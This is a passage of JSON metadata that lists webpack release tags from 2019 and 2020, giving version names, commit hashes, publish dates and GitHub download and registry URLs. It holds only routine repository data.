68e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/